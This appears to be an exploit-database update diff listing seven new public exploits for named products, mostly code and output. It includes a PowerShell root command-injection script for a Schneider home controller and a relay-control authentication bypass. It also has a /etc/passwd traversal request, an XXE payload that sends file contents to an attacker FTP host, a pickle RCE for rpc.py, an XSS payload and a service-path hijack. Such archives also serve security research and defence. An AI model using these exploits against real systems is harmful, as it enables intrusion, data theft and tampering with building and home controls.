DB: 2022-07-30

7 changes to exploits/shellcodes

Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
rpc.py 0.6.0 - Remote Code Execution (RCE)
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
Geonetwork 4.2.0 - XML External Entity (XXE)
Dingtian-DT-R002 3.1.276A - Authentication Bypass
Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)

exploits/hardware/remote/50987.ps1

@@ -0,0 +1,204 @@
+# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
+# Exploit Author: LiquidWorm
+
+<#SpaceLogic.ps1
+
+Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
+
+
+Vendor: Schneider Electric SE
+Product web page: https://www.se.com
+                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
+                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
+Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
+                  formerly known as C-Bus Wiser Home Controller MK2
+                  V1.31.460 and prior
+                  Firmware: 604
+
+Summary: SpaceLogic C-Bus Home Automation System
+Lighting control and automation solutions for
+buildings of the future, part of SpaceLogic.
+SpaceLogic C-Bus is a powerful, fully integrated
+system that can control and automate lighting
+and many other electrical systems and products.
+The SpaceLogic C-Bus system is robust, flexible,
+scalable and has proven solutions for buildings
+of the future. Implemented for commercial and
+residential buildings automation, it brings
+control, comfort, efficiency and ease of use
+to its occupants.
+
+Wiser Home Control makes technologies in your
+home easy by providing seamless control of music,
+home theatre, lighting, air conditioning, sprinkler
+systems, curtains and shutters, security systems...
+you name it. Usable anytime, anywhere even when
+you are away, via preset shortcuts or direct
+control, in the same look and feel from a wall
+switch, a home computer, or even your smartphone
+or TV - there is no wiser way to enjoy 24/7
+connectivity, comfort and convenience, entertainment
+and peace of mind homewide!
+
+The Wiser 2 Home Controller allows you to access
+your C-Bus using a graphical user interface, sometimes
+referred to as the Wiser 2 UI. The Wiser 2 Home
+Controller arrives with a sample project loaded
+and the user interface accessible from your local
+home network. With certain options set, you can
+also access the Wiser 2 UI from anywhere using
+the Internet. Using the Wiser 2 Home Controller
+you can: control equipment such as IP cameras,
+C-Bus devices and non C-Bus wired and wireless
+equipment on the home LAN, schedule events in
+the home, create and store scenes on-board, customise
+a C-Bus system using the on-board Logic Engine,
+monitor the home environment including C-Bus and
+security systems, control ZigBee products such
+as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
+
+Examples of equipment you might access with Wiser
+2 Home Controller include lighting, HVAC, curtains,
+cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
+multi-room audio and security controls.
+
+Desc: The home automation solution suffers from
+an authenticated OS command injection vulnerability.
+This can be exploited to inject and execute arbitrary
+shell commands as the root user via the 'name' GET
+parameter in 'delsnap.pl' Perl/CGI script which is
+used for deleting snapshots taken from the webcam.
+
+=========================================================
+/www/delsnap.pl:
+----------------
+
+01: #!/usr/bin/perl
+02: use IO::Handle;
+03:
+04:
+05: select(STDERR);
+06: $| = 1;
+07: select(STDOUT);
+08: $| = 1;
+09:
+10: #print "\r\n\r\n";
+11:
+12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
+13: use CGI;
+14:
+15: my $PROGNAME = "delsnap.pl";
+16:
+17: my $cgi = new CGI();
+18:
+19: my $name = $cgi->param('name');
+20: if ($name eq "list") {
+21:     print "\r\n\r\n";
+22:     print "DATA=";
+23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
+24:     exit(0);
+25: }
+26: if ($name eq "deleteall") {
+27:     print "\r\n\r\n";
+28:     print "DELETINGALL=TRUE&";
+29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
+30:     print "COMPLETED=true\n";
+31:     exit(0);
+32: }
+33: #print "name $name\n";
+34: print "\r\n\r\n";
+35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";
+36:
+37: unlink $filename or die "COMPLETED=false\n";
+38:
+39: print "COMPLETED=true\n";
+
+=========================================================
+
+Tested on: Machine: OMAP3 Wiser2 Board
+           CPU: ARMv7 revision 2
+           GNU/Linux 2.6.37 (armv7l)
+           BusyBox v1.22.1
+           thttpd/2.25b
+           Perl v5.20.0
+           Clipsal 81
+           Angstrom 2009.X-stable
+           PICED 4.14.0.100
+           lighttpd/1.7
+           GCC 4.4.3
+           NodeJS v10.15.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5710
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
+
+Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
+
+CVE ID: CVE-2022-34753
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753
+
+
+27.03.2022
+
+#>
+
+
+$host.UI.RawUI.ForegroundColor = "Green"
+if ($($args.Count) -ne 2)  {
+    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
+} else {
+    $ip = $args[0]
+    $cmd = $args[1]
+    $cmdinj = "/delsnap.pl?name=|$cmd"
+    Write-Host("`nSending command '$cmd' to $ip`n")
+    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
+    curl -v $ip$cmdinj
+}
+
+
+<#PoC
+
+PS C:\> .\SpaceLogic.ps1
+
+Usage: .\SpaceLogic.ps1 [IP] [CMD]
+
+
+PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"
+
+Sending command 'uname -a;id;pwd' to 192.168.1.2
+
+VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
+VERBOSE: received 129-byte response of content type text/html; charset=utf-8
+
+
+StatusCode        : 200
+StatusDescription : OK
+Content           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
+                    uid=0(root) gid=0(root)
+                    /custom-package
+
+RawContent        : HTTP/1.1 200 OK
+                    Access-Control-Allow-Origin: *
+                    Connection: keep-alive
+                    Content-Length: 129
+                    Content-Type: text/html; charset=utf-8
+                    Date: Thu, 30 Jun 2022 14:48:43 GMT
+                    ETag: W/"81-LTIWJvYlDBYAlgXEy...
+Forms             : {}
+Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;
+                    charset=utf-8]...}
+Images            : {}
+InputFields       : {}
+Links             : {}
+ParsedHtml        : mshtml.HTMLDocumentClass
+RawContentLength  : 129
+
+
+
+
+PS C:\>
+#>

exploits/hardware/webapps/50984.py

@@ -0,0 +1,92 @@
+# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
+# Google Dork: NA
+# Date: 13th July 2022
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
+# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
+# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
+# Version: V3.1.276A
+# Tested on: MAC OSX
+# CVE : CVE-2022-29593#!/usr/local/bin/python3
+# Author: Victor Hanna (SpiderLabs)
+# DingTian DT-R002 2CH Smart Relay
+# CWE-294 - Authentication Bypass by Capture-replay
+
+import requests
+import re
+import urllib.parse
+from colorama import init
+from colorama import Fore, Back, Style
+import sys
+import os
+import time
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def banner():
+    print ("[+]********************************************************************************[+]")
+    print ("|   Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t    |")
+    print ("|   Description: DingTian DT-R002 2CH Smart Relay                                      |")
+    print ("|   Usage : "+sys.argv[0]+" <host> <relay#>                                           |")
+    print ("[+]********************************************************************************[+]")
+
+def main():
+    os.system('clear')
+    banner()
+    urlRelay1On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
+    urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
+    urlRelay2On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
+    urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
+
+    headers = {
+        "Host": ""+host+"",
+        "User-Agent": "9lyph/3.0",
+        "Accept": "*/*",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate",
+        "DNT": "1",
+        "Connection": "close",
+        "Referer": "http://"+host+"/relay_cgi.html",
+        "Cookie": "session=4463009"
+    }
+
+    print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
+    for i in range(5):
+        time.sleep (1)
+        print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
+    try:
+        if (relay == "1"):
+            print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay1On)
+            time.sleep (5)
+            print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
+            r = requests.get(urlRelay1Off)
+            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
+        elif (relay == "2"):
+            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay2On)
+            time.sleep (5)
+            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
+            r = requests.get(urlRelay2Off)
+            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
+        else:
+            print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
+    except KeyboardInterrupt:
+        sys.exit(1)
+    except requests.exceptions.Timeout:
+        print ("[!] Connection to host timed out !")
+        sys.exit(1)
+    except requests.exceptions.Timeout:
+        print ("[!] Connection to host timed out !")
+        sys.exit(1)
+    except Exception as e:
+        print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    if len(sys.argv)>2:
+        host = sys.argv[1]
+        relay = sys.argv[2]
+        main ()
+    else:
+        print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)

exploits/hardware/webapps/50986.txt

@@ -0,0 +1,117 @@
+# Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
+# Exploit Author: LiquidWorm
+
+
+Vendor: CAREL INDUSTRIES S.p.A.
+Product web page: https://www.carel.com
+Affected version: Firmware: A2.1.0 - B2.1.0
+                  Application Software: 2.15.4A
+                  Software version: v16 13020200
+
+Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R
+applications and systems. It consists of programmable controllers, user interfaces,
+gateways and communication interfaces, remote management systems to offer the OEMs
+working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced
+to the more widely-used Building Management Systems, and can also be integrated into
+proprietary supervisory systems.
+
+Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.
+Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script
+is not properly verified before being used to download log files. This can be exploited
+to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
+
+=======================================================================================
+/usr/local/www/usr-cgi/logdownload.cgi:
+---------------------------------------
+
+01: #!/bin/bash
+02:
+03: if [ "$REQUEST_METHOD" = "POST" ]; then
+04:         read QUERY_STRING
+05:         REQUEST_METHOD=GET
+06:         export REQUEST_METHOD
+07:         export QUERY_STRING
+08: fi
+09:
+10: LOGDIR="/usr/local/root/flash/http/log"
+11:
+12: tmp=${QUERY_STRING%"$"*}
+13: cmd=${tmp%"="*}
+14: if [ "$cmd" = "dir" ]; then
+15:         PATHCURRENT=$LOGDIR/${tmp#*"="}
+16: else
+17:         PATHCURRENT=$LOGDIR
+18: fi
+19:
+20: tmp=${QUERY_STRING#*"$"}
+21: cmd=${tmp%"="*}
+22: if [ "$cmd" = "file" ]; then
+23:         FILECURRENT=${tmp#*"="}
+24: else
+25:         if [ -f $PATHCURRENT/lastlog.csv.gz ]; then
+26:                 FILECURRENT=lastlog.csv.gz
+27:         else
+28:                 FILECURRENT=lastlog.csv
+29:         fi
+30: fi
+31:
+32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then
+33:         echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"
+34:         cat carel.inc.html
+35:         echo "<center>File not available!</center>"
+36:         cat carel.bottom.html
+37:         exit
+38: fi
+39:
+40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then
+41:         if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then
+42:                 if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then
+43:                         echo -ne "Content-Type: text/csv\r\n"
+44:                 else
+45:                         echo -ne "Content-Type: image/svg+xml\r\n"
+46:                 fi
+47:         else
+48:                 echo -ne "Content-Type: image/bmp\r\n"
+49:         fi
+50: else
+51:         echo -ne "Content-Type: application/x-gzip\r\n"
+52: fi
+53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"
+54:
+55: cat $PATHCURRENT/$FILECURRENT
+
+=======================================================================================
+
+Tested on: GNU/Linux 4.11.12 (armv7l)
+           thttpd/2.29
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5709
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
+
+
+10.05.2022
+
+--
+
+
+$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
+
+root:x:0:0:root:/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/false
+bin:x:2:2:bin:/bin:/bin/false
+sys:x:3:3:sys:/dev:/bin/false
+sync:x:4:100:sync:/bin:/bin/sync
+mail:x:8:8:mail:/var/spool/mail:/bin/false
+www-data:x:33:33:www-data:/var/www:/bin/false
+operator:x:37:37:Operator:/var:/bin/false
+nobody:x:65534:65534:nobody:/home:/bin/false
+guest:x:502:101::/home/guest:/bin/bash
+carel:x:500:500:Carel:/home/carel:/bin/bash
+http:x:48:48:HTTP users:/usr/local/www/http:/bin/false
+httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash
+sshd:x:1000:1001:SSH drop priv user:/:/bin/false

exploits/multiple/webapps/50982.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)
+# Date: 2022-July-11
+# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
+# Vendor Homepage: https://geonetwork-opensource.org/
+# Version: Geonetwork 3.10.X through 4.2.0
+# Tested on: Microsoft Windows Server & Linux
+
+# Description:
+# GeoNetwork 3.1.x through 4.2.0
+# During rendering pdf of map.
+# The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server.
+
+====================PDF RENDERING====================
+
+POST /geonetwork/pdf/create.json HTTP/1.1
+Host: REDACTED
+Content-Type: application/json
+Connection: close
+Content-Length: 563
+
+{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],
+
+"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,
+
+20037508.34],
+
+"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}
+
+
+The parameters baseURL will be your XML files :
+
+====================XXE_ATTACK====================
+
+====================XXE.XML=======================
+
+<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]>
+<foo>&external;</foo>
+
+====================X.dtd=========================
+They will call the x.dtd
+
+<!ENTITY % stuff SYSTEM "file:///etc/hostname">
+<!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">

exploits/php/webapps/50988.txt

@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
+# Date: 21/07/2022
+# Exploit Author: Steffin Stanly
+# Vendor Homepage: https://github.com/lesterchan/wp-useronline
+# Software Link: https://wordpress.org/plugins/wp-useronline/
+# Version: <=2.87.6
+# Tested on Windows
+
+How to reproduce vulnerability:
+
+1. Install WordPress 6.0.1
+2. Install and activate WP-UserOnline plugin.
+3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site.
+4. Add the following payload "><script>alert(1)</script> and save changes
+5. On visiting the dashboard, You will observe that the payload successfully got stored in the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

exploits/python/remote/50983.py

@@ -0,0 +1,52 @@
+# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 2022-07-12
+# Exploit Author: Elias Hohl
+# Vendor Homepage: https://github.com/abersheeran
+# Software Link: https://github.com/abersheeran/rpc.py
+# Version: v0.4.2 - v0.6.0
+# Tested on: Debian 11, Ubuntu 20.04
+# CVE : CVE-2022-35411
+
+import requests
+import pickle
+
+# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
+
+HOST =3D "127.0.0.1:65432"
+
+URL =3D f"http://{HOST}/sayhi"
+
+HEADERS =3D {
+    "serializer": "pickle"
+}
+
+
+def generate_payload(cmd):
+
+    class PickleRce(object):
+        def __reduce__(self):
+            import os
+            return os.system, (cmd,)
+
+    payload =3D pickle.dumps(PickleRce())
+
+    print(payload)
+
+    return payload
+
+
+def exec_command(cmd):
+
+    payload =3D generate_payload(cmd)
+
+    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
+
+
+def main():
+    exec_command('curl http://127.0.0.1:4321')
+    # exec_command('uname -a')
+
+
+if __name__ =3D=3D "__main__":
+    main()

exploits/windows/local/50985.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
+# Date: 07/14/2022
+# Exploit Author: Angelo Pio Amirante
+# Version: 1.0.0.4
+# Tested on: Windows 10
+# Patched version: 1.0.5.0
+# CVE: CVE-2022-35899
+
+# Step to discover the unquoted service path:
+
+wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
+
+# Info on the service:
+
+C:\>sc qc "GameSDK Service"
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: GameSDK Service
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                       : 0
+        NOME_VISUALIZZATO         : GameSDK Service
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit
+If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".

files_exploits.csv

@@ -11491,6 +11491,7 @@ id,file,description,date,author,type,platform,port
 50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
 50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows,
 50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows,
+50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",1970-01-01,"Angelo Pio Amirante",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18715,6 +18716,8 @@ id,file,description,date,author,type,platform,port
 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows,
 50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple,
 50974,exploits/windows/remote/50974.py,"IOTransfer 4.0 - Remote Code Execution (RCE)",1970-01-01,"Tomer Peled",remote,windows,
+50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",1970-01-01,"Elias Hohl",remote,python,
+50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45043,3 +45046,7 @@ id,file,description,date,author,type,platform,port
 50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php,
 50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,
 50980,exploits/php/webapps/50980.txt,"WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",1970-01-01,"Amel BOUZIANE-LEBLOND",webapps,multiple,
+50984,exploits/hardware/webapps/50984.py,"Dingtian-DT-R002 3.1.276A - Authentication Bypass",1970-01-01,"Victor Hanna",webapps,hardware,
+50986,exploits/hardware/webapps/50986.txt,"Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal",1970-01-01,LiquidWorm,webapps,hardware,
+50988,exploits/php/webapps/50988.txt,"WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffin Stanly",webapps,php,